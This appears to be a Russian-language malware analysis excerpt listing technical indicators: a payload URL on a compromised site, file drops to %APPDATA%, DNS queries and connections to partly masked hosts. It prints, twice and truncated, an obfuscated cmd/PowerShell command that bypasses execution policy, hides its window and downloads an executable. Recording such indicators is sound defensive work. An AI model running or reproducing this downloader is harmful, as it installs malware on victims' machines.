Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^eRsHE^ll.^E^Xe ^-e^xeCut^I^ONpolIcy^ B^yPaSs^ -N^o^proFi^Le -^W^I^nd^Ow^stY^l^E^ hID^DeN ^(^nE^W-^OBj^EC^T^ sysTE^M^.^NE^T.^WebCL^Ie^nt).DOwNL^oaDfI^lE('http://nexconte...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "poW^eRsHE^ll.^E^Xe ^-e^xeCut^I^ONpolIcy^ B^yPaSs^ -N^o^proFi^Le -^W^I^nd^Ow^stY^l^E^ hID^DeN ^(^nE^W-^OBj^EC^T^ sysTE^M^.^NE^T.^WebCL^Ie^nt).DOwNL^oaDfI^lE('http://nexconte...' (со скрытым окном)